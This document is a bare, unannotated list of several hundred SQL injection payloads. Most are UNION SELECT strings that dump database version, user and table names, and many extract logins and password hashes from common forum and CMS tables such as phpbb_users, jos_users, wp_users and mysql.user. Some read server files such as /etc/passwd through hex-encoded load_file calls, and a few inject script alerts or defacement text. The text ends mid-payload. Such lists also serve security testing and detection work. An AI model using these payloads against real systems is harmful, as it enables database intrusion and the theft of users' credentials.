(SELECT COUNT(*) FROM (select count(0),concat((select CONCAT(0x75737372,concat(0x7665723a,version()),0x75737372) from information_schema.tables limit 0,1),floor(rand(0)*2)) from information_schema.tables group by 2 limit 0,1)a)-- -1' OR substring(@@version,1,1)=4 -- 1;select cast(table_name as int) from information_schema.tables where table_name not in ($$views$$)-- 1;select cast(version() as int) 1;select cast(version()||chr(58)||current_user as int) 1;select cast(version()||chr(58)||inet_server_port()||chr(58)||current_database() as int) 1;select cast(version()||chr(58)||user||chr(58)||current_database() as int) 1;select cast(version()||chr(58)||user||chr(58)||inet_server_port() as int) 1 SELECT * from adminuser group by adminuser.userid having 1=1# 1' select union 1,2,3,4,5,6/* 1=(select @@version) -1 union/* -1 union all select 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),17-- -1 union all select 0,1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user(),version(),database()),11,12,13,14,15,16,17,18-- -1 union all select 0,1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10,11,12-- -1 union all select 0,1,2,3,4,5,6,concat_ws(version(),user(),database()),8,9,10,11,12,13,14,15,16,17-- -1 union all select 0,1,2,3,4,5,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),7,8,9,10,11,12-- -1 union all select 0,1,2,3,4,5,concat_ws(version(),user(),database()),7,8,9,10,11,12,13,14,15,16,17,18-- -1 union all select 0,1,2,3,4,concat_ws(0x3a,id,passwd) from passwd-- -1 union all select 0,1,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),6,7,8,9,10,11,12,13,14,15-- -1 union all select 0,1,2,3,concat_ws(0x3a,version(),user(),database()),5,6-- -1 union all select 0,1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7-- -1 union all select 0,1,2,concat_ws(0x3a,id,loginname,namelc,email,created,modified,modifiedby,password,passwordchanged,superuser,disabled) from phplist_admin-- -1' union all select 0,1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/* -1 union all select 0,1,2,concat_ws(0x3a,version(),user(),database()),4,5-- -1 union all select 0,1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10-- -1 union all select 0,1,2,concat_ws(version(),user(),database()),4,5,6,7-- -1 union all select 0,1,concat(user_id,0x3a,username,0x3a,user_password),3,4,5,6 from phpbb_users limit 1,1-- -1 union all select 0,1,concat_ws(0x3a,id,login,password),3,4 from admin-- -1 union all select 0,1,concat_ws(0x3a,user,password,file_priv),3,4,5 from mysql.user-- -1 union all select 0,1,concat_ws(0x3a,version(),user(),database()),3,4,5-- -1 union all select 0,1,concat_ws(0x3a,version(),user(),database()),3,4,5,6-- -1 union all select 0,1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12-- -1 union all select 0,1,concat_ws(0x3c62723e,version(),user(),database()),3-- -1 union all select 0,1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5-- -1 union all select 0,1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10-- -1 union all select 0,1,concat_ws(user(),version(),database()),3,4,5,6,7-- -1 union all select 0,1,concat_ws(version(),user(),database()),3-- -1 union all select 0,1,concat_ws(version(),user(),database()),3,4,5-- -1 union all select 0,1,concat_ws(version(),user(),database()),3,4,5,6,7,8-- -1 union all select 0,1,CONVERT(CONCAT_WS(CHAR(32,58,32),user(),database(),version()) USING latin1),3,4,5,6,7,8,9-- -1 union all select 0,1,group_concat(0x3a,user_id,0x3a,username,0x3a,userpass),3 from educos.poll_user-- -1 union all select 0,concat_ws(0x3a,username,password),2,3,4,5 from users-- -1 union all select 0,concat_ws(0x3a,version(),user(),database()),2-- -1 union all select 0,concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8-- -1 union all select 0,concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- -1 union all select 0,concat_ws(version(),user(),database()),2,3-- -1 union all select 0,concat_ws(version(),user(),database()),2,3,4-- -1 union all select 0,concat_ws(version(),user(),database()),2,3,4,5,6-- -1 union all select 0,convert(concat_ws(0x3a,user,password) using latin1) from mysql.user-- -1 union all select 0,convert(concat_ws(version(),user(),database()) using latin1),2,3,4,5,6,7-- -1 union all select 0,convert(user() using latin1),convert(version() using latin1),convert(database() using latin1),4-- -1 union all select 0,convert(version() using latin1),convert(database() using latin1),3,convert(user() using latin1),5,6,7,8,9,10,11,12,13,14-- 1 UNION ALL SELECT 11111111111,concat(user(),0x3a,version(),0x3a,database()),3222222222222,4111111111111111-- -1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,Password,Name,12 from tblAdmin -1 union all select 1,2,3,4,5,6,7,8,concat_ws(char(58,58),user(),database(),version()),10,11,12,13,14,15,16,17,18,19-- -1 union all select 1,2,3,4,5,6,table_name,8,9,10,11 from information_schema.tables-- -1 union all select 1,2,3,4,5,concat(user,char(58),pass),7,8,9,10,11,12,null,14,15,16,17,18,19,20 from admin/* -1 union all select 1,2,3,aes_decrypt(aes_encrypt(concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),0x71),0x71),5,6,7,8,9,10 -- -1 union all select 1,2,3,concat(admin_username,char(58),admin_password),5,6,7,8 from joovili_admins/* -1 union all select 1,2,3,concat(email,0x3a,password),5,6,7,8,9 from users-- -1 union all select 1,2,3,concat_ws(0x3a,login,pwd, email),5,6,7,8,9,10 from anime-- -1 union all select 1,2,3,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),5 -- -1) UNION ALL SELECT 1,2,3,SYSTEM_USER,@@version,6,7,8,9,10,@@SERVERNAME,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,user,41,user,43,user,45,user,46,47,48,49,50,51-- -1 union all select 1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables-- -1' UNION ALL SELECT 1,2,concat(database(),char(58),user(),char(58),version()),concat(username,0x3e,password),5,6,7,8,9 from admins/* -1 UNION ALL SELECT 1,2,concat(email,0x3a,password),4,5,6,7,8,9,10 FROM people -1/**/uniON/**/AlL/**/SELeCT/**/1,2,coNCAt(user_email,0x3a,user_pass,0x3a,user_firstname,0x3a,user_firstname),4,5/**/FROM/**/user/**/limit/**/0,1 -- -1 UNION ALL SELECT 1,2,concat(username,0x3a,password),4,5,6 from users-- -1 UNION ALL SELECT 1,2,concat(username,0x3a,password),user(),5,6,7,8,9,10 FROM jos_users-- -1 union all select 1,2,concat_ws(0x3a2a3a,version(),database(),user(),@@version_compile_os),4,5,6,7-- -1 union all select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6-- -1 union all select 1,2,null,4,5,concat(username,char(58),password),7 from logins/* -1 union all select 1,2,version(),4,5,6 -1 union all select 1blablabla-- -1/**/UniON/**/alL/**/SeLecT/**/1,CONcAt(0x3a,Admin_id,0x3a,username,0x3a,password,0x3a,email,0x3a,mobile),3,4,5,6,7,8/**/FROM/**/ri_admin -- -1 union all select 1,concat(database(),0x3a,user(),0x3a,version()),3,4,5,6 -1 union all select 1,concat(email,char(58),password),3,4,5,6,7 from user/* -1 union all select 1,concat(user_level,0x3a,username,0x3a,user_password,0x3a,user_email),null,null,5,null,7,8 from phpbb_users-- 1 union all select 1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20 from jos_users-- -1 union all select 1,concat_ws(0x203a20,version(),user(),host,user,password,file_priv),3,4,5,6,7,8,9,10,11,12,13,14,15 from mysql.user -1 union all select 1,concat_ws(0x3a,version(),database(),user()),3,4,5 -- -1 union all select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7 -- -1 Union ALL Select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7-- -1 UNION ALL SELECT 1,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),3,4,5,6,7 -- 1 union all select 1,null,null,null,null,null,null,null -- -1 UNION ALL SELECT 1,table_name from information_schema.tables-- -1/**/union/**/all/**/select/**/1,user,3,pass,5,6,7 from user-- -1 UNION ALL SELECT 1,version(),3,4,5,6,7,8,9,10,11,12-- -1" UNION ALL SELECT 1,version(),user(),database(),5,6,7,8 FROM jos_users# -1 union all select concat(1,char(45),version()) -1 UNION ALL SELECT concat(membername,0x3a,passwd) from smf_members where id_member=1-- -1 union all select concat_ws(0x3a,version(),user(),database()) from users-- -1 union all select database(),2,3,4,5,6,7-- -1 union all select username,user_password,3,4 from phpbb_users where user_id=2 # not sql #-1 union antidef select 1,2,concat_ws(0x3a,username,password),4,5,6,7,8 from odmin -- #-1 union selec 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 -1 UNION SELECT 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54 from phpbb_users/* -1') union select 0,1,2,3,4,5,6,7,8,concat(pn_uname,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/* -1 union select 0,1,2,3,4,5,6,7,load_file(0x2F6574632F706173737764),9,10,11/* -1/**/union/**/select/**/0,1,2,3,4,5,concat(uid,char(20),username,char(20),password),7,8,version(),10,user(),12,13,14,15,16,17 from users/* -1 union select 0,1,2,3,4,concat_ws(0x0b,version(),user(),database(),@@version_compile_os) -1 union select 0,1,2,3,4,group_concat(0x3a,user_login,0x3a,user_pass),6,7,8 from wp_users-- -1 union select 0,1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6,7,8 from s_users limit 0,1-- -1 union select 0,1,2,3,concat(Version(),0x3a,USER(),0x3a,DATABASE()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/* -1 union select 0,1,2,3,concat(version(),";",user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18/* -1 union select 0,1,2,3, concat_ws(sbadmin_pwd,0x3a,sbadmin_name),5,6,7,8,9,10 from sbjks_admin-- -1 union select 0,1,2,concat(username,0x3a,password),null,5,6 from jos_users/* -1 UNION SELECT 0,1,2,concat_ws(0x0b,user(),version(),database()),4,5,6,7,8,9,10,11,12 -- -1/**/union/**/select/**/0,1,2,name,password,5,6,7 from gd_member/* 1 union select 0,1,2,sifre,4,5,6,7,8,9,0 from sifre -1 UNION SELECT 0,1,2,table_name,1,1,4,0,0 FROM information_schema.tables -1 union select 0,1,2,user,pass,5 from login-- 1 union select 0,1,adkull,3,4,5,6,7,8 from ayar -1 union select 0,1,adkull,3,4,5,6,7 from ayar -1 union select 0,1,adsif,3,4,5,6,7,8 from ayar 1 union select 0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),3/* -1 union select 0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/* -1 union select 0,1,concat(username,0x3a,password,0x3a,email) from user/* -1 union select 0,1,concat(version(),char(58),user(),char(58),database()),3/* -1 union select 0,1,concat_ws(0x203a20,version(),user(),host,user,password,file_priv),3,4 from mysql.user limit 1,1-- -1 union select 0,1,concat_ws(0x3a,username,password),3,4,5,6,7 FROM apb_users-- -1 UNION SELECT 0,1,concat_ws(0xb,0xb,user(),version(),database(),0x0b) /* -1 union select 0,1,concat_ws(char(58),ID_MEMBER,memberName,passwd,emailAddress),3,4 from forum.smf_members limit 0,1/* 1 union select 0,1,convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE()) using latin1),3,4,5,6,7,8,9,10,11,12/* -1 UNION SELECT 0,999999,concat(username,0x3a,PASSWORD),0,0,0,0,0,0 FROM mos_users union select * from mos_content_comments where 1=1 -1 UNION SELECT 0,999999,concat(username,0x3a,PASSWORD,0x3a,email),0,0,0,0,0,0 FROM mos_users-- -1 union select 0,concat(password,0x3a,username),2,3,4,5 from users/* -1 union select 0,concat_ws(0x2F,uname,email,pass),2 from kpro_user where ugroup=1 limit 0,1 -1 union select 0,concat_ws(0x3a,gid,gname,gpwd,gmail),2 from sp_gbook-- 1 union select 0,convert(concat(USER(),VERSION(),DATABASE()) using latin1),2,3,4,5,6,7,8,9,10,11,12/* -1 union select 0,group_concat(username,0x3a,password),2,3 from login-- -1 union select 0,'Im-IRAQI',concat_ws(0x3a,username,password),0,0,0,0,0 FROM apb_users-- -1 union select 0,kullaniciadi,2,3,4,5,6,7 from admin -1 union select 0,username,password,3,4,5,6,7,8,email,password,username,10,11,12,13,14,15,16,17,18 from users -1 union select 0,vemail,2,vpassword,4,5 from admin/* -1 union select 0,version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,25,26,27/* 1 union select 0,VERSION(),DATABASE(),USER(),4,5/* 1 union select 0,VERSION(),USER(),3,DATABASE(),5,6,7,8,9,10,11,12,13/* -1 union select 0x2a2a4861436b2a2a/* -1 union select 0x3C2F7469746C653E,concat_ws(0x3a,user(),database(),version()),3,4,5 -1 union select 0x3c7363726970743e616c6572742827444956455227293c2f7363726970743e from mysql.user limit 0,1/* -1 union select 0x536e406b333a206e75206f6368656e207370617420686f63686563612e2e2e,2/* -1 UNION SELECT 0x73716C696E6A666C6431,0x73716C696E6A666C6432,0x73716C696E6A666C6433,0x73716C696E6A666C6434,concat(0x3a,version(),database(),user()),0x73716C696E6A666C6436,0x73716C696E6A666C6437,0x73716C696E6A666C6438,0x73716C696E6A666C6439-- -1 union select 1 /* -1 union select 1-- 1'union select 1/* 1) union select 1/* -1 union select 1,0x3C68313E2A425241564F2A3C2F68313E,3,4/* -1 union select 1,0x3C68313E505245564544203A443C2F68313E,3,4/* -1 union select 1,0x3c7363726970743e616c65727428272a443156455227293c2f7363726970743e,3,4,5/* -1 UNION SELECT 1,0x4C4F47494E3A4D7953514C5F686173682870617373776F7264293A655F6D61696C,concat(login,char(58),password,char(58),email),4,5,6,7 from users limit 8541,1/* -1 union select 11,1,10,9,table_name,7,6,5,4,3,2 from information_schema.tables limit 35,1 -- 1 UNION SELECT 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 FROM login -1 union select 1,1,1,1,1,1,1,concat_ws(0x3a,id,usertype,username,password),1,1,1,1,1,1,1,1 from jos_users -- -1 union select 1111111,password from mysql.user/* -1 union select 1111,role,concat(login,char(58),passw) from user where id=22 limit 0,1/* -1' union select 111,222,333,444,555,concat_ws(0x3a,database(),user(),version()),7,8,9/* -1' union select 111,222,333,444,group_concat(login,0x3a,pass) from admin-- -1' union select 111,concat(converge_id,':',unhex(hex(name)),':',unhex(hex(converge_pass_hash)),':',unhex(hex(converge_pass_salt))),333,444,555,666 from ipb_members_converge,ipb_members where converge_id=id limit 0,1/* -1 union select 111,concat(user(),version(),database()),333,444,555/* -1' union select 111,unhex(hex(concat(version(),':',user(),':',database()))),333,444,555,666/* -1 union select 1,1,1,unhex(hex(concat_ws(0x3a,user(),version(),database()))),3,4,5-- -1' union select 111,user(),database(),version(),555,666/* -1 union select 11,22,version(),44,user(),database()/* -1 union select 1,1,3,1,1 from information_schema.tables/* 1 union select 1,1,3,4,5,6,7,8,9,0,1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6-- -1' union select 1,1,concat_ws(0x2F,cast(version() as binary),cast(database() as binary),cast(user() as binary)),1,1,1,1/* -1 union select 1,-1 union select 1,column_name,3,4,5,6 from information_schema.columns where table_name=CHAR(0x72,0x77,0x64,0x5F,0x75,0x73,0x65,0x72,0x73)/* -1 UNION SELECT 1,1,user(),3,version(),5,6,7,8,9,10,11-- -1 union select 1,2-- -1' union select 1,2-- -1 union select 1,2,0x2a2a2a4441204879204841585045482a2a2a203a2d28,4,5,6,7,8,9,10/* -1 union select 1,2,0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764,4,5,6,7,8 -- -1 union select 1,21,3,4,load_file(char(47,118,97,114,47,119,119,119,47,110,101,108,115,111,110,47,105,110,100,101,120,46,112,104,112)),6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,32,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,31,4,5,6,7,8,9,0,1,2,3,4 -1 UNION SELECT 1,22222222,concat(username,password),244,23 from users/* -1 union select 1,2,3-- -1 union select 1,2,3-- -1 union select 1,2.3-- -1' union select 1,2,3-- -1' union select 1,2,3/* -1' union select 123-- 1' union select 1,2,3 -- -1' union select 1,2,322,4 from mysql.user/* -1 union select 1,,2,3,4/* -1 union select 1,2,3,4 -1 union select 1,2,3,4-- -1' union select 1,2,3,4-- -1' union select 1,2,3,4/* 1 UNION SELECT 1,2,3,4,/* -1 union select 1,2,3,4,0,6,ascii(substring((select version()),1,1)),8-- -1 union select 1,2,3,4,5-- -1 union select 1,2,3,4,5/ -1 union select 1,2,3,4,55,6,concat_ws(0x3a,version(),user(),database()),8,9-- -1 union select 1,2,3,4,5,6-- -1 union select 1,2,3,4,5,6/* -1' union select 1,2,3,4,5,6-- -1 union select 1,2,3,4,5,6,7-- -1' union select 1,2,3,4,5,6,7/* 1 union select 1,2,3,4,5,6,7/* -1 union select 1,2,3,4,5,6,7,8-- -1' union select 1,2,3,4,5,6,7,8-- 1' union select 1,2,3,4,5,6,7,8 -- -1 UNION SELECT 1,2,3,4,5,6,7,8/* -1 UNION SELECT 1,2,3,4,5,6,7,8# -1' union select 1,2,3,4,5,6,7,8,9-- -1 union select 1,2,3,4,5,6,7,8,9,0,1-- 1 union select 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,unhex(hex(concat_ws(0x3a,user,password))),17,18,19,20,21 from mysql.user limit 0,1/* -1' union select 1,2,3,4,5,6,7,8,9,0,11,concat_ws(0x3a,user,password),13,14,15,16,17,18 from mysql.user/* -1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,88,table_name,0,1,2,3,4,5,6,7,888,99,0,1,2,3,4,5,6,7,8888,9,0,1,2,3,4,5,6,7,88888,99,0,1,2 from information_schema.tables/* -1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 admins/* -1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,concat_ws(char(58),version(),user(),database(),@@version_compile_os),8,9,0,1,2,3,4,5,6,7,8,9-- 1' union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,TABLE_NAME,7,8,9,0,1,2,3,4,5,6 FROM INFORMATION_SCHEMA.TABLES/* -1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,concat(user(),0x3a,database(),0x3a,version()),6,7/* -1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,concat(username,char(58),user_password),6,7 from forumLLL_users limit 1,1/* -1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,concat(email,0x3a,pswd),5,6,7,8,USER(),0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0 from person limit 696,1/* -1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,concat_ws(0x3a,version(),user(),database()),5-- -1 union select 1,2,3,4,5,6,7,8,9,10-- -1 union select 1,2,3,4,5,6,7,8,9,10/* -1' union select 1,2,3,4,5,6,7,8,9,10-- 1 union select 1,2,3,4,5,6,7,8,9,10-- -1 union select 1,2,3,4,5,6,7,8,9,10,11/* -1' union select 1,2,3,4,5,6,7,8,9,10,11-- -1' union select 1,2,3,4,5,6,7,8,9,10,11/* - 1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12-- 1 union select 1,2,3,4,5,6,7,8,9,10,11,12-- -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13-- -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13-- 1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13/* -1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13 -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14 /* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14-- -1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14/* -1) UNION select 1,2,3,4,5,6,7,8,9,10,11,12,13,14/* 1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 -- -1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- -1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17# -1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,0x320A756E696F6E0A73656C6563740A312C322C7461626C655F6E616D652C342C352C362C372C382C392C31300A66726F6D0A696E666F726D6174696F6E5F736368656D612E7461626C65730A23,19,20,21,22,23,24,25,26-- -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,/* -1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/* 1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*/* 1 union select 1,2,34,5,67,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- 1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 /* 1'union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,,17,18,19,20,21,22,23,24,25,26,27-- -1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33-- -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/* -1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40-- -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 /* 1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,1,2,3,4,5,6,7,8 from products -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73/* 1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101/* -1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104 from news -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,aes_decrypt(aes_encrypt(concat(user(),char(50),version(),char(50),database()),1),1),57/* -1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,(SELECT group_concat(user,0x3a,password,0x3a,userid,0x3a,groupid,0x3a,fullname,0x3a,iv,0x3a,workgroups) FROM user),51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68-- -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,concat_ws(0x3a,user,password),49,50,51,52,53,54,55,56,57,58,59,60 from mysql.user/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,concat(0x3a3a,USER())/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,database(),44,45,46,47,48,49,50,51/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,concat_ws(0x3a,version(),database(),user()),43,44,45,46,47,48,49,50/* -1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,concat_ws(0x3a,version(),database(),user()),40,41,42,43,44,45/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,concat_ws(0x3a,user(),version(),database())-- -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from mysql.user/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from users/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat_ws(0x3a,username,password),30,31,32,33,34,35,36 from users/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat_ws(0x3a,version(),user(),database()),30 -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from admin/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from tb_admin-- -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from users/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat_ws(0x3a3a,benutzername_usr,passwort_usr),28,29,30,31,32 from user_usr limit 0,1-- -1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,group_concat(AUSR_LOGIN,0x3B,AUSR_PWD SEPARATOR 0x0b) FROM nweurope.ADMUSER -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,concat(username,0x3a,password),27,28,29,30,31,32,33,34,35,36,37,38,39 from user limit 0,1/* -1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,user(),27-- -1' UNION SELECT 